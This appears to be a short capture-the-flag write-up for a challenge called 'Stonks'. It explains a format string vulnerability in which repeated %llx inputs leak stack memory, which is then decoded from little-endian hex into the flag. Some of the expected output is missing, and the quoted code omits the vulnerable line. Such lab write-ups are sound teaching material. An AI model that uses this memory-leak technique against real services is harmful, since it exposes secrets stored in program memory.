Stonks (20)

Format string vulnerability


I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc 16439


This is a format string vulnerability.

Note that the user_buf is printed directly without any format specifier.

    char *user_buf = malloc(300 + 1);
    printf("What is your API token?\n");
    scanf("%300s", user_buf);
    printf("Buying stonks with token:\n");

We will send a series of %llx strings, which stands for long long hex values. This will print the stack values:

We can then look for what may be strings. Taking into consideration the range of ASCII values that correspond to alphabets, this portion looks interesting:


It is in little endian, so we would need to convert it to big endian first. We have:


which when converted, gives us the following string:


We are missing part of the flag, and that is due to the next element in the stack, ffa8007d65616336, which is 366361657D00A8FF in big endian. Note the \x00 byte - that is the string terminator. The remaining part of the flag is 6cae}.

Last updated